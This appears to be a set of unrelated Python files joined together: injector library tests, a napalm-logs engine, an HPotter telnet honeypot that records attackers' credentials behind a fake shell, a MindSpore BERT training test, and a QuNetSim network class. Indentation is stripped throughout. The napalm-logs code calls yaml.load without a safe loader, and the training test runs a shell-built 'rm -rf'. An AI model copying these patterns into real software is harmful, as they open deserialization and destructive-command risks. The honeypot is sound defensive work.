def test_inject_decorator_does_not_break_manual_construction_of_pyqt_objects():
class PyQtFake:
@inject
def __init__(self):
pass
def __getattribute__(self, item):
if item == '__injector__':
raise RuntimeError(
'A PyQt class would raise this exception if getting '
'self.__injector__ before __init__ is called and '
'self.__injector__ has not been set by Injector.'
)
return object.__getattribute__(self, item)
instance = PyQtFake() # This used to raise the exception
assert isinstance(instance, PyQtFake)
def test_using_an_assisted_builder_with_a_provider_raises_an_injector_error():
class MyModule(Module):
@provider
def provide_a(self, builder: AssistedBuilder[EmptyClass]) -> EmptyClass:
return builder.build()
injector = Injector(MyModule)
with pytest.raises(Error):
injector.get(EmptyClass)
def test_newtype_integration_works():
UserID = NewType('UserID', int)
def configure(binder):
binder.bind(UserID, to=123)
injector = Injector([configure])
assert injector.get(UserID) == 123
@pytest.mark.skipif(sys.version_info < (3, 6), reason="Requires Python 3.6+")
def test_dataclass_integration_works():
import dataclasses
# Python 3.6+-only syntax below
exec(
"""
@inject
@dataclasses.dataclass
class Data:
name: str
""",
locals(),
globals(),
)
def configure(binder):
binder.bind(str, to='data')
injector = Injector([configure])
assert injector.get(Data).name == 'data'
def test_get_bindings():
def function1(a: int) -> None:
pass
assert get_bindings(function1) == {}
@inject
def function2(a: int) -> None:
pass
assert get_bindings(function2) == {'a': int}
@inject
@noninjectable('b')
def function3(a: int, b: str) -> None:
pass
assert get_bindings(function3) == {'a': int}
# Let's verify that the inject/noninjectable ordering doesn't matter
@noninjectable('b')
@inject
def function3b(a: int, b: str) -> None:
pass
assert get_bindings(function3b) == {'a': int}
if HAVE_ANNOTATED:
# The simple case of no @inject but injection requested with Inject[...]
def function4(a: Inject[int], b: str) -> None:
pass
assert get_bindings(function4) == {'a': int}
# Using @inject with Inject is redundant but it should not break anything
@inject
def function5(a: Inject[int], b: str) -> None:
pass
assert get_bindings(function5) == {'a': int, 'b': str}
# We need to be able to exclude a parameter from injection with NoInject
@inject
def function6(a: int, b: NoInject[str]) -> None:
pass
assert get_bindings(function6) == {'a': int}
# The presence of NoInject should not trigger anything on its own
def function7(a: int, b: NoInject[str]) -> None:
pass
assert get_bindings(function7) == {}
# There was a bug where in case of multiple NoInject-decorated parameters only the first one was
# actually made noninjectable and we tried to inject something we couldn't possibly provide
# into the second one.
@inject
def function8(a: NoInject[int], b: NoInject[int]) -> None:
pass
assert get_bindings(function8) == {}
|
base.py
|
# -*- coding: utf-8 -*-
'''
napalm-logs base
'''
from __future__ import absolute_import
from __future__ import unicode_literals
# Import std lib
import os
import yaml
import time
import socket
import logging
from multiprocessing import Process, Pipe
# Import napalm-logs pkgs
import napalm_logs.exceptions
from napalm_logs.transport import get_transport
from napalm_logs.device import NapalmLogsDeviceProc
from napalm_logs.server import NapalmLogsServerProc
from napalm_logs.listener import NapalmLogsListenerProc
log = logging.getLogger(__name__)
class NapalmLogs:
def __init__(self,
hostname='0.0.0.0',
port=514,
transport='zmq',
publish_hostname='0.0.0.0',
publish_port=49017,
config_path=None,
config_dict=None,
extension_config_path=None,
extension_config_dict=None,
log_level='warning',
log_fmt='%(asctime)s,%(msecs)03.0f [%(name)-17s][%(levelname)-8s] %(message)s'):
'''
Init the napalm-logs engine.
:param hostname: The address to bind the syslog client. Default: 0.0.0.0.
:param port: Listen port. Default: 514.
:param publish_hostname: The address to bing when publishing the OC
objects. Default: 0.0.0.0.
:param publish_port: Publish port. Default: 49017.
'''
self.hostname = hostname
self.port = port
self.publish_hostname = publish_hostname
self.publish_port = publish_port
self.config_path = config_path
self.config_dict = config_dict
self._transport_type = transport
self.extension_config_path = extension_config_path
self.extension_config_dict = extension_config_dict
self.log_level = log_level
self.log_fmt = log_fmt
# Setup the environment
self._setup_log()
self._setup_transport()
self._build_config()
self._precompile_regex()
# Private vars
self.__os_proc_map = {}
def __exit__(self, exc_type, exc_value, exc_traceback):
self.stop_engine()
if exc_type is not None:
log.error('Exiting due to unhandled exception', exc_info=True)
self.__raise_clean_exception(exc_type, exc_value, exc_traceback)
def __del__(self):
self.stop_engine()
def _setup_log(self):
'''
Setup the log object.
'''
logging_level = {
'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL
}.get(self.log_level.lower())
logging.basicConfig(format=self.log_fmt,
level=logging_level)
def _setup_transport(self):
'''
Setup the transport.
'''
transport_class = get_transport(self._transport_type)
self.transport = transport_class(self.publish_hostname,
self.publish_port)
def _load_config(self, path):
'''
Read the configuration under a specific path
and return the object.
'''
config = {}
if not os.path.isdir(path):
msg = (
'Unable to read from {path}: '
'the directory does not exist!'
).format(path=path)
log.error(msg)
raise IOError(msg)
files = os.listdir(path)
# Read all files under the config dir
for file in files:
# And allow only .yml and .yaml extensions
if not file.endswith('.yml') and not file.endswith('.yaml'):
continue
filename, _ = file.split('.')
# The filename is also the network OS name
filepath = os.path.join(path, file)
try:
with open(filepath, 'r') as fstream:
config[filename] = yaml.load(fstream)
except yaml.YAMLError as yamlexc:
log.error('Invalid YAML file: {}'.format(filepath), exc_info=True)
raise IOError(yamlexc)
if not config:
msg = 'Unable to find proper configuration files under {path}'.format(path=path)
log.error(msg)
raise IOError(msg)
return config
def _build_config(self):
'''
Build the config of the napalm syslog parser.
'''
if not self.config_dict:
if not self.config_path:
# No custom config path requested
# Read the native config files
self.config_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'config'
)
log.info('Reading the configuration from {path}'.format(path=self.config_path))
self.config_dict = self._load_config(self.config_path)
if not self.extension_config_dict and self.extension_config_path:
# When extension config is not sent as dict
# But `extension_config_path` is specified
log.info('Reading extension configuration from {path}'.format(path=self.extension_config_path))
self.extension_config_dict = self._load_config(self.extension_config_path)
elif not self.extension_config_dict:
self.extension_config_dict = {}
if not self.extension_config_dict:
# No extension config, no extra build
return
for nos, nos_config in self.extension_config_dict.items():
if nos not in self.config_dict and nos_config:
self.config_dict[nos] = nos_config
continue
self.config_dict[nos].update(nos_config)
def _precompile_regex(self):
'''
Go through the configuration and precompile all regular expressions,
so the parsing should be faster.
'''
pass
def start_engine(self):
'''
Start the child processes (one per device OS),
open the socket to start receiving messages.
'''
# TODO prepare the binding to be able to listen to syslog messages
skt = None
# TODO
log.info('Preparing the transport')
self.transport.start()
log.info('Starting child processes for each device type')
os_pipe_map = {}
for device_os, device_config in self.config_dict.items():
child_pipe, parent_pipe = Pipe(duplex=False)
log.debug('Initialized pipe for {dos}'.format(dos=device_os))
log.debug('Parent handle is {phandle} ({phash})'.format(phandle=str(parent_pipe),
phash=hash(parent_pipe)))
log.debug('Child handle is {chandle} ({chash})'.format(chandle=str(child_pipe),
chash=hash(child_pipe)))
log.info('Starting the child process for {dos}'.format(dos=device_os))
dos = NapalmLogsDeviceProc(device_os,
device_config,
self.transport,
child_pipe)
os_pipe_map[device_os] = parent_pipe
os_proc = Process(target=dos.start)
os_proc.start()
log.debug('Started process {pname} for {dos}, having PID {pid}'.format(
pname=os_proc._name,
dos=device_os,
pid=os_proc.pid
)
)
self.__os_proc_map[device_os] = os_proc
log.debug('Setting up the syslog pipe')
serve_pipe, listen_pipe = Pipe(duplex=False)
log.debug('Starting the server process')
server = NapalmLogsServerProc(serve_pipe,
os_pipe_map,
self.config_dict)
self.pserve = Process(target=server.start)
self.pserve.start()
log.debug('Started server process as {pname} with PID {pid}'.format(
pname=self.pserve._name,
pid=self.pserve.pid
)
)
log.debug('Starting the listener process')
listener = NapalmLogsListenerProc(skt, # Socket object
listen_pipe)
self.plisten = Process(target=listener.start)
self.plisten.start()
log.debug('Started listener process as {pname} with PID {pid}'.format(
pname=self.plisten._name,
pid=self.plisten.pid
)
)
def stop_engine(self):
log.info('Shutting down the engine')
if hasattr(self, 'transport'):
self.transport.tear_down()
|
telnet.py
|
import socketserver
import threading
from hpotter import tables
from hpotter.tables import CREDS_LENGTH
from hpotter import logger
from hpotter.env import logger, write_db, telnet_server
from hpotter.docker_shell.shell import fake_shell, get_string
# https://docs.python.org/3/library/socketserver.html
class TelnetHandler(socketserver.BaseRequestHandler):
def creds(self, prompt):
logger.debug('Getting creds')
tries = 0
response = ''
while response == '':
self.request.sendall(prompt)
logger.debug('Before creds get_string')
response = get_string(self.request, limit=CREDS_LENGTH, telnet=True)
tries += 1
if tries > 2:
logger.debug('Creds no response')
raise IOError('no response')
logger.debug('Creds returning %s', response)
return response
def handle(self):
self.request.settimeout(30)
connection = tables.Connections(
sourceIP=self.client_address[0],
sourcePort=self.client_address[1],
destIP=self.server.socket.getsockname()[0],
destPort=self.server.socket.getsockname()[1],
proto=tables.TCP)
write_db(connection)
try:
username = self.creds(b'Username: ')
password = self.creds(b'Password: ')
except Exception as exception:
logger.debug(exception)
self.request.close()
return
logger.debug('After creds')
creds = tables.Credentials(username=username, password=password, \
connection=connection)
write_db(creds)
self.request.sendall(b'Last login: Mon Nov 20 12:41:05 2017 from 8.8.8.8\n')
prompt = b'\n$: ' if username in ('root', 'admin') else b'\n#: '
try:
fake_shell(self.request, connection, prompt, telnet=True)
except Exception as exc:
logger.debug(type(exc))
logger.debug(exc)
logger.debug('telnet fake_shell threw exception')
self.request.close()
logger.debug('telnet handle finished')
class TelnetServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass
def start_server():
global telnet_server
telnet_handler = TelnetHandler
telnet_server = TelnetServer(('0.0.0.0', 23), telnet_handler)
threading.Thread(target=telnet_server.serve_forever).start()
def stop_server():
if telnet_server:
telnet_server.shutdown()
|
test_bert_thor_mlperf.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
import time
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.dataset as dataset
import mindspore.common.dtype as mstype
import mindspore.communication.management as D
from mindspore import context
from mindspore import log as logger
from mindspore.train.callback import Callback
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
import mindspore.dataset.engine.datasets as de
import mindspore.dataset.transforms.c_transforms as C
from model_zoo.official.nlp.bert_thor.src.bert_for_pre_training import BertNetworkWithLoss, BertTrainOneStepCell
from model_zoo.official.nlp.bert_thor.src.bert_net_config import bert_net_cfg
from model_zoo.official.nlp.bert_thor.src.config import cfg
from model_zoo.official.nlp.bert_thor.src.lr_generator import get_bert_lr, get_bert_damping
from model_zoo.official.nlp.bert_thor.src.model_thor import Model
from model_zoo.official.nlp.bert_thor.src.thor_for_bert_arg import THOR
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
DATASET_PATH = "/home/workspace/mindspore_dataset/bert/thor/en-wiki-512_test_first1wan"
load_checkpoint_path = ""
data_sink_steps = 100
train_steps = 200
batch_size = 12
np.random.seed(1)
dataset.config.set_seed(1)
os.environ['GLOG_v'] = str(2)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
self.epoch_mseconds_list = []
self.per_step_mseconds_list = []
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
cb_params = run_context.original_args()
epoch_mseconds = (time.time() - self.epoch_time) * 1000
self.epoch_mseconds_list.append(epoch_mseconds)
per_step_mseconds = epoch_mseconds / self.data_size
self.per_step_mseconds_list.append(per_step_mseconds)
print("epoch: {}, per_step_mseconds are {}".format(cb_params.cur_epoch_num, str(per_step_mseconds)), flush=True)
class LossCallback(Callback):
def __init__(self):
super(LossCallback, self).__init__()
self.loss_list = []
def epoch_end(self, run_context):
cb_params = run_context.original_args()
self.loss_list.append(cb_params.net_outputs.asnumpy())
print("epoch: {}, step: {}, outputs are {}".format(cb_params.cur_epoch_num, cb_params.cur_step_num,
str(cb_params.net_outputs)), flush=True)
def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None):
"""create train dataset"""
# apply repeat operations
files = os.listdir(data_dir)
data_files = []
for file_name in files:
if "tfrecord" in file_name:
data_files.append(os.path.join(data_dir, file_name))
data_files = sorted(data_files)
ds = de.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None,
columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels",
"masked_lm_positions", "masked_lm_ids", "masked_lm_weights"],
shuffle=de.Shuffle.FILES if do_shuffle == "true" else False,
num_shards=device_num, shard_id=rank, shard_equal_rows=True)
ori_dataset_size = ds.get_dataset_size()
print('origin dataset size: ', ori_dataset_size)
type_cast_op = C.TypeCast(mstype.int32)
ds = ds.map(operations=type_cast_op, input_columns="masked_lm_ids")
ds = ds.map(operations=type_cast_op, input_columns="masked_lm_positions")
ds = ds.map(operations=type_cast_op, input_columns="next_sentence_labels")
ds = ds.map(operations=type_cast_op, input_columns="segment_ids")
ds = ds.map(operations=type_cast_op, input_columns="input_mask")
ds = ds.map(operations=type_cast_op, input_columns="input_ids")
# apply batch operations
ds = ds.batch(batch_size, drop_remainder=True)
logger.info("data size: {}".format(ds.get_dataset_size()))
logger.info("repeat count: {}".format(ds.get_repeat_count()))
return ds
def _set_bert_all_reduce_split():
"""set bert all_reduce fusion split, support num_hidden_layers is 12 and 24."""
from mindspore.parallel._auto_parallel_context import auto_parallel_context
if bert_net_cfg.num_hidden_layers == 12:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([29, 58, 87, 116, 145, 174, 203, 217],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([28, 55, 82, 109, 136, 163, 190, 205],
"hccl_world_groupsum3")
elif bert_net_cfg.num_hidden_layers == 24:
if bert_net_cfg.use_relative_positions:
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([30, 90, 150, 210, 270, 330, 390, 421],
"hccl_world_groupsum3")
else:
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum1")
auto_parallel_context().set_all_reduce_fusion_split_indices([38, 77], "hccl_world_groupsum3")
def train_process_bert_thor(q, device_id, epoch_size, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", device_id=device_id, save_graphs=False)
context.set_context(reserve_class_name_in_scope=False)
context.set_context(max_call_depth=3000)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
rank = device_id % device_num
context.reset_auto_parallel_context()
_set_bert_all_reduce_split()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
bert_net_cfg.num_hidden_layers = 4
ds = create_bert_dataset(device_num=device_num, rank=rank, do_shuffle=False, data_dir=DATASET_PATH, schema_dir=None)
net_with_loss = BertNetworkWithLoss(bert_net_cfg, True)
new_repeat_count = epoch_size * ds.get_dataset_size() // data_sink_steps
new_repeat_count = min(new_repeat_count, train_steps // data_sink_steps)
lr = get_bert_lr()
damping = get_bert_damping()
optimizer = THOR(filter(lambda x: x.requires_grad, net_with_loss.get_parameters()), lr, cfg.Thor.momentum,
filter(lambda x: 'matrix_A' in x.name, net_with_loss.get_parameters()),
filter(lambda x: 'matrix_G' in x.name, net_with_loss.get_parameters()),
cfg.Thor.weight_decay, cfg.Thor.loss_scale, bert_net_cfg.num_hidden_layers,
bert_net_cfg.batch_size, damping)
time_monitor_callback = TimeMonitor(data_sink_steps)
loss_callback = LossCallback()
callback = [time_monitor_callback, loss_callback]
if load_checkpoint_path:
param_dict = load_checkpoint(load_checkpoint_path)
load_param_into_net(net_with_loss, param_dict)
net_with_grads = BertTrainOneStepCell(net_with_loss, optimizer=optimizer)
model = Model(net_with_grads, frequency=cfg.Thor.frequency)
model.train(new_repeat_count, ds, callbacks=callback, dataset_sink_mode=True, sink_size=data_sink_steps)
loss_list = loss_callback.loss_list
per_step_mseconds = time_monitor_callback.per_step_mseconds_list
q.put({'loss': loss_list, 'cost': per_step_mseconds})
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_bert_thor_mlperf_8p():
"""test bert thor mlperf 8p"""
q = Queue()
device_num = 8
epoch_size = 2
process = []
for i in range(device_num):
device_id = i
process.append(Process(target=train_process_bert_thor, args=(q, device_id, epoch_size, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
sum_loss_list = []
sum_cost_list = []
for _ in range(train_steps // data_sink_steps):
sum_loss_list.append(0.0)
sum_cost_list.append(0.0)
for _ in range(device_num):
output = q.get()
loss_list = output['loss']
cost_list = output['cost']
sum_loss_list = np.sum([loss_list, sum_loss_list], axis=0)
sum_cost_list = np.sum([cost_list, sum_cost_list], axis=0)
for j in range(train_steps // data_sink_steps):
print("epoch: ", j, "sum_loss: ", sum_loss_list[j], "sum_cost: ", sum_cost_list[j])
mean_loss = sum_loss_list[-1] / device_num
mean_cost = sum_cost_list[-1] / device_num
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
assert mean_cost < 64.2
assert mean_loss < 7.9
if __name__ == '__main__':
test_bert_thor_mlperf_8p()
|
network.py
|
import random
import time
from inspect import signature
from queue import Queue
import matplotlib.pyplot as plt
import networkx as nx
from qunetsim.backends import EQSNBackend
from qunetsim.objects import Qubit, RoutingPacket, Logger, DaemonThread
from qunetsim.utils.constants import Constants
# Network singleton
class Network:
""" A network control singleton object. """
__instance = None
@staticmethod
def get_instance():
if Network.__instance is None:
Network()
return Network.__instance
@staticmethod
def reset_network():
if Network.__instance is not None:
Network.__instance.stop(True)
Network.__instance = None
__instance = Network()
def __init__(self):
if Network.__instance is None:
self.ARP = {}
# The directed graph for the connections
self.classical_network = nx.DiGraph()
self.quantum_network = nx.DiGraph()
self._quantum_routing_algo = nx.shortest_path
self._classical_routing_algo = nx.shortest_path
self._use_hop_by_hop = True
self._packet_queue = Queue()
self._stop_thread = False
self._use_ent_swap = False
self._queue_processor_thread = None
self._delay = 0.1
self._packet_drop_rate = 0
self._backend = None
Network.__instance = self
else:
raise Exception('this is a singleton class')
@property
def use_ent_swap(self):
return self._use_ent_swap
@use_ent_swap.setter
def use_ent_swap(self, use_ent_swap):
self._use_ent_swap = use_ent_swap
@property
def use_hop_by_hop(self):
"""
Get the routing style for the network.
Returns:
If the network uses hop by hop routing.
"""
return self._use_hop_by_hop
@use_hop_by_hop.setter
def use_hop_by_hop(self, should_use):
"""
Set the routing style for the network.
Args:
should_use (bool): If the network should use hop by hop routing or not
"""
if not isinstance(should_use, bool):
raise Exception('use_hop_by_hop should be a boolean value.')
self._use_hop_by_hop = should_use
@property
def classical_routing_algo(self):
"""
Get the routing algorithm for the network.
"""
return self._classical_routing_algo
@classical_routing_algo.setter
def classical_routing_algo(self, algorithm):
"""
Set the routing algorithm for the network.
Args:
algorithm (function): The routing function. Should return a list of host_ids which represents the route
"""
self._classical_routing_algo = algorithm
@property
def quantum_routing_algo(self):
"""
Gets the quantum routing algorithm of the network.
Returns:
algorithm (function): The quantum routing algorithm of the network
"""
return self._quantum_routing_algo
@quantum_routing_algo.setter
def quantum_routing_algo(self, algorithm):
"""
Sets the quantum routing algorithm of the network.
Args:
algorithm (function): The routing algorithm of the network. Should take an input and an output
"""
if not callable(algorithm):
raise Exception("The quantum routing algorithm must be a function.")
num_algo_params = len(signature(algorithm).parameters)
if num_algo_params != 3:
raise Exception("The quantum routing algorithm function should take three parameters: " +
"the (nx) graph representation of the network, the sender address and the " +
"receiver address.")
self._quantum_routing_algo = algorithm
@property
def delay(self):
"""
Get the delay interval of the network.
"""
return self._delay
@delay.setter
def delay(self, delay):
"""
Set the delay interval of the network.
Args:
delay (float): Delay in network tick in seconds
"""
if not (isinstance(delay, int) or isinstance(delay, float)):
raise Exception('delay should be a number')
if delay < 0:
raise Exception('Delay should not be negative')
self._delay = delay
@property
def packet_drop_rate(self):
"""
Get the drop rate of the network.
"""
return self._packet_drop_rate
@packet_drop_rate.setter
def packet_drop_rate(self, drop_rate):
"""
Set the drop rate of the network.
Args:
drop_rate (float): Probability of dropping a packet in the network
"""
if drop_rate < 0 or drop_rate > 1:
raise Exception('Packet drop rate should be between 0 and 1')
if not (isinstance(drop_rate, int) or isinstance(drop_rate, float)):
raise Exception('Packet drop rate should be a number')
self._packet_drop_rate = drop_rate
@property
def arp(self):
return self.ARP
@property
def num_hosts(self):
return len(self.arp.keys())
def add_host(self, host):
"""
Adds the *host* to ARP table and updates the network graph.
Args:
host (Host): The host to be added to the network.
"""
Logger.get_instance().debug('host added: ' + host.host_id)
self.ARP[host.host_id] = host
self._update_network_graph(host)
def add_hosts(self, hosts):
"""
Adds the *hosts* to ARP table and updates the network graph.
Args:
hosts (list): The hosts to be added to the network.
"""
for host in hosts:
self.add_host(host)
def remove_host(self, host):
"""
Removes the host from the network.
Args:
host (Host): The host to be removed from the network.
"""
if host.host_id in self.ARP:
del self.ARP[host.host_id]
if self.quantum_network.has_node(host.host_id):
self.quantum_network.remove_node(host.host_id)
if self.classical_network.has_node(host.host_id):
self.classical_network.remove_node(host.host_id)
def remove_c_connection(self, sender, receiver):
if self.classical_network.has_edge(sender, receiver):
self.classical_network.remove_edge(sender, receiver)
def remove_q_connection(self, sender, receiver):
if self.quantum_network.has_edge(sender, receiver):
self.quantum_network.remove_edge(sender, receiver)
def remove_hosts(self, hosts):
for host in hosts:
self.remove_host(host)
def update_host(self, host):
"""
Update the connections of a host in the network.
Args:
host:
Returns:
"""
self.remove_host(host)
self.add_host(host)
def _remove_network_node(self, host):
"""
Removes the host from the ARP table.
Args:
host (Host): The host to be removed from the network.
"""
try:
self.classical_network.remove_node(host.host_id)
except nx.NetworkXError:
Logger.get_instance().error('attempted to remove a non-exiting node from network')
def _update_network_graph(self, host):
"""
Add host *host* to the network and update the graph representation of the network
Args:
host: The host to be added
"""
if not self.classical_network.has_node(host.host_id):
self.classical_network.add_node(host.host_id)
if not self.quantum_network.has_node(host.host_id):
self.quantum_network.add_node(host.host_id)
for connection in host.classical_connections:
if not self.classical_network.has_edge(host.host_id, connection):
edge = (host.host_id, connection, {'weight': 1})
self.classical_network.add_edges_from([edge])
for connection in host.quantum_connections:
if not self.quantum_network.has_edge(host.host_id, connection):
edge = (host.host_id, connection, {'weight': 1})
self.quantum_network.add_edges_from([edge])
def shares_epr(self, sender, receiver):
"""
Returns boolean value dependent on if the sender and receiver share an EPR pair.
Args:
receiver (Host): The receiver
sender (Host): The sender
Returns:
(bool) whether the sender and receiver share an EPR pair.
"""
host_sender = self.get_host(sender)
host_receiver = self.get_host(receiver)
return host_sender.shares_epr(receiver) and host_receiver.shares_epr(sender)
def get_host(self, host_id):
"""
Returns the host with the *host_id*.
Args:
host_id (str): ID number of the host that is returned.
Returns:
Host (Host): Host with the *host_id*
"""
if host_id not in self.ARP:
return None
return self.ARP[host_id]
def get_ARP(self):
"""
Returns the ARP table.
Returns:
dict: The ARP table
"""
return self.ARP
def get_host_name(self, host_id):
"""
Args:
host_id (str): ID number of the host whose name is returned if it is in ARP table
Returns the name of the host with *host_id* if the host is in ARP table , otherwise returns None.
Returns:
dict or None: Name of the host
"""
if host_id not in self.ARP:
return None
return self.ARP[host_id].cqc.name
def get_quantum_route(self, source, dest):
"""
Gets the route for quantum information from source to destination.
Args:
source (str): ID of the source host
dest (str): ID of the destination host
Returns:
route (list): An ordered list of ID numbers on the shortest path from source to destination.
"""
return self.quantum_routing_algo(self.quantum_network, source, dest)
def get_classical_route(self, source, dest):
"""
Gets the route for classical information from source to destination.
Args:
source (str): ID of the source host
dest (str): ID of the destination host
Returns:
route (list): An ordered list of ID numbers on the shortest path from source to destination.
"""
return self.classical_routing_algo(self.classical_network, source, dest)
def _entanglement_swap(self, sender, receiver, route, q_id, o_seq_num, blocked):
"""
Performs a chain of entanglement swaps with the hosts between sender and receiver to create a shared EPR pair
between sender and receiver.
Args:
sender (Host): Sender of the EPR pair
receiver (Host): Receiver of the EPR pair
route (list): Route between the sender and receiver
q_id (str): Qubit ID of the sent EPR pair
o_seq_num (int): The original sequence number
blocked (bool): If the pair being distributed is blocked or not
"""
host_sender = self.get_host(sender)
def establish_epr(net, s, r):
if not net.shares_epr(s, r):
self.get_host(s).send_epr(r, q_id, await_ack=True)
else:
old_id = self.get_host(s).change_epr_qubit_id(r, q_id)
net.get_host(r).change_epr_qubit_id(route[i], q_id, old_id)
# Create EPR pairs on the route, where all EPR qubits have the id q_id
threads = []
for i in range(len(route) - 1):
threads.append(DaemonThread(establish_epr, args=(self, route[i], route[i + 1])))
for t in threads:
t.join()
for i in range(len(route) - 2):
host = self.get_host(route[i + 1])
q = host.get_epr(route[0], q_id, wait=10)
if q is None:
print("Host is %s" % host.host_id)
print("Search host is %s" % route[0])
print("Search id is %s" % q_id)
print("EPR storage is")
print(host.EPR_store)
Logger.get_instance().error('Entanglement swap failed')
return
data = {'q': q,
'eq_id': q_id,
'node': sender,
'o_seq_num': o_seq_num,
'type': Constants.EPR}
if route[i + 2] == route[-1]:
data = {'q': q,
'eq_id': q_id,
'node': sender,
'ack': True,
'o_seq_num': o_seq_num,
'type': Constants.EPR}
host.send_teleport(route[i + 2], None, await_ack=True, payload=data, generate_epr_if_none=False)
# Change in the storage that the EPR qubit is shared with the receiver
q2 = host_sender.get_epr(route[1], q_id=q_id)
host_sender.add_epr(receiver, q2, q_id, blocked)
Logger.get_instance().log('Entanglement swap was successful for pair with id '
+ q_id + ' between ' + sender + ' and ' + receiver)
def _establish_epr(self, sender, receiver, q_id, o_seq_num, blocked):
"""
Instead doing an entanglement swap, for efficiency we establish EPR pairs
directly for simulation, if an entanglement swap would have been possible.
Args:
sender (Host): Sender of the EPR pair
receiver (Host): Receiver of the EPR pair
q_id (str): Qubit ID of the sent EPR pair
o_seq_num (int): The original sequence number
blocked (bool): If the pair being distributed is blocked or not
"""
host_sender = self.get_host(sender)
host_receiver = self.get_host(receiver)
q1 = Qubit(host_sender)
q2 = Qubit(host_sender)
q1.H()
q1.cnot(q2)
host_sender.add_epr(receiver, q1, q_id, blocked)
host_receiver.add_epr(sender, q2, q_id, blocked)
host_receiver.send_ack(sender, o_seq_num)
def _route_quantum_info(self, sender, receiver, qubits):
"""
Routes qubits from sender to receiver.
Args:
sender (Host): Sender of qubits
receiver (Host): Receiver qubits
qubits (List of Qubits): The qubits to be sent
"""
def transfer_qubits(r, s, original_sender=None):
for q in qubits:
# Modify the qubit according to error function of the model
qubit_id = q.id
q = self.ARP[s].quantum_connections[self.ARP[r].host_id].model.qubit_func(q)
if q is None:
# Log failure of transmission if qubit is lost
Logger.get_instance().log('transfer qubits - transfer of qubit ' + qubit_id + ' failed')
return False
else:
Logger.get_instance().log('transfer qubits - sending qubit ' + q.id)
q.send_to(self.ARP[r].host_id)
Logger.get_instance().log('transfer qubits - received ' + q.id)
# Unblock qubits in case they were blocked
q.blocked = False
if self.ARP[r].q_relay_sniffing:
self.ARP[r].q_relay_sniffing_fn(original_sender, receiver, q)
return True
route = self.get_quantum_route(sender, receiver)
i = 0
while i < len(route) - 1:
Logger.get_instance().log('sending qubits from ' + route[i] + ' to ' + route[i + 1])
if not transfer_qubits(route[i + 1], route[i], original_sender=route[0]):
return False
i += 1
return True
def _process_queue(self):
"""
Runs a thread for processing the packets in the packet queue.
"""
while True:
packet = self._packet_queue.get()
if not packet:
# Stop the network
self._stop_thread = True
break
# Artificially delay the network
if self.delay > 0:
time.sleep(self.delay)
# Simulate packet loss
packet_drop_var = random.random()
if packet_drop_var > (1 - self.packet_drop_rate):
Logger.get_instance().log("PACKET DROPPED")
if packet.payload_type == Constants.QUANTUM:
packet.payload.release()
continue
sender, receiver = packet.sender, packet.receiver
if packet.payload_type == Constants.QUANTUM:
if not self._route_quantum_info(sender, receiver, [packet.payload]):
continue
try:
if packet.protocol == Constants.RELAY and not self.use_hop_by_hop:
full_route = packet.route
route = full_route[full_route.index(sender):]
else:
if packet.protocol == Constants.REC_EPR:
route = self.get_classical_route(sender, receiver)
else:
route = self.get_classical_route(sender, receiver)
if len(route) < 2:
raise Exception('No route exists')
elif len(route) == 2:
if packet.protocol != Constants.RELAY:
if packet.protocol == Constants.REC_EPR:
host_sender = self.get_host(sender)
q = host_sender \
.backend \
.create_EPR(host_sender.host_id,
receiver,
q_id=packet.payload['q_id'],
block=packet.payload['blocked'])
host_sender.add_epr(receiver, q)
self.ARP[receiver].rec_packet(packet)
else:
self.ARP[receiver].rec_packet(packet.payload)
else:
if packet.protocol == Constants.REC_EPR:
q_id = packet.payload['q_id']
blocked = packet.payload['blocked']
q_route = self.get_quantum_route(sender, receiver)
if self.use_ent_swap:
DaemonThread(self._entanglement_swap,
args=(sender, receiver, q_route, q_id,
packet.seq_num, blocked))
else:
DaemonThread(self._establish_epr,
args=(sender, receiver, q_id,
packet.seq_num, blocked))
else:
network_packet = self._encode(route, packet)
self.ARP[route[1]].rec_packet(network_packet)
